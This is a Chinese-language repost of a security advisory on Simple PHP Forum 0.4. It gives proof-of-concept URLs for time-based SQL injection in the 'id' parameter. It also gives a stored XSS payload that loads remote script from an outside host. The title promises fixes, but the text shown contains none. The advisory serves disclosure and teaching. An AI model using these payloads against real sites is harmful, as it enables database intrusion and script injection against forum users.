网站地图    收藏   

主页 > 后端 > 网站安全 >

sphpforum 0.4多个缺陷及修复 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] 作者: loneferret of Offensive Security影响产品: sphpforum影响版本: 0.4 (older versions may be affected)下载地址: http://sourceforge.net/projects/sphpforum/程序概述# Simple PHP Forum......

作者: loneferret of Offensive Security 
 
影响产品: sphpforum 
 
影响版本: 0.4 (older versions may be affected) 
 
下载地址: http://sourceforge.net/projects/sphpforum/ 
 
程序概述 
 
# Simple PHP Forum is a PHP based forum/BBS board is designed to be small, simple,  
 
# fast and allow easy integration into any existing web site. 
 
  
 
缺陷分析: 
 
# Due to improper input sanitation, parameters are prone to SQL injection. Stored 
 
# crossed site scripting is also present in some forms. 
 
  
 
# PoC 1: 
 
# SQL Injection 
 
# Page: view_topic.php / view_profile.php? 
 
缺陷参数  'id' 
 
# http://www.2cto.com /sphpforum/sphpforum-0.4/view_topic.php?id=50%27%20and%20sleep%2810%29%20and%20%271%27=%271 
 
# http://172.16.194.148/sphpforum/sphpforum-0.4/view_profile.php?id=loneferret%27%20and%20sleep%2810%29%20and%20%271%27=%271 
 
  
 
# PoC 2: 
 
#存储型 XSS 
 
# Page: create_topic.php 
 
# Vulnerable field: Topic 
 
# Payload: <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论